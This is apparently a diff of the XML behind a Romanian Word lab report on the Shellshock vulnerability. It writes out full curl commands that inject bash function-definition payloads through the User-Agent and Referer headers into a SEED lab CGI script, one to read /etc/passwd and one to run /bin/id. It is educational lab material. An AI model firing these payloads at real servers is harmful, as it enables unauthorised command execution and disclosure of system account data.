+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ne vom folosi de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>optiunea -A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a lui curl in felul urmator: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">valoarea variabilei de mediu </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>User-Agent</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> va fi setata la valoarea: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>"(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) { echo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>salut;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">}; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">echo Content_type: text/plain; echo; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:left="1440" w:hanging="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+        </w:rPr>
+        <w:t>cat /</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>etc/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+        </w:rPr>
+        <w:t>passwd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>comanda întreaga:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>curl -A "() { echo salut;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">}; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">echo Content_type: text/plain; echo; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:left="1440" w:hanging="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>/bin/cat /etc/passwd" -v http://www.seedlab-shellshock.com/cgi-bin/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>vul</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>.cgi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>in ruma executiei comenzii vom obtine conturile de utuilizator existente pe server</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="16">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>-110490</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="4171950"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="15" name="Image15" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="15" name="Image15" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="4171950"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
         <w:rPr/>
       </w:pPr>
@@ -2936,6 +2861,540 @@
           <w:lang w:val="ro-RO"/>
         </w:rPr>
         <w:t>ID-ul de utilizator al procesului server</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ne vom folosi de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>optiunea -e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a lui curl in felul urmator: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">valoarea variabilei de mediu </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>HTTP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>-REFFERER</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> va fi setata la valoarea: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>"(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) { echo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>salut;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">}; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">echo Content_type: text/plain; echo; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:left="1440" w:hanging="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>comanda întreaga:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>curl -e "() { echo salut;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">}; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">echo Content_type: text/plain; echo; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:left="1440" w:hanging="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>" -v http://www.seedlab-shellshock.com/cgi-bin/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>vul</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>.cgi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t xml:space="preserve">in ruma executiei comenzii vom obtine </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>id-ul de utilizator al procesului</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="17">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>119380</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>140335</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="2622550"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="16" name="Image16" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="16" name="Image16" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2622550"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
       </w:r>
     </w:p>
     <w:p>
@@ -2975,37 +3434,1186 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Sarcina 3.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-        <w:t>D</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ștergerea fișierului din </w:t>
-      </w:r>
-      <w:r>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
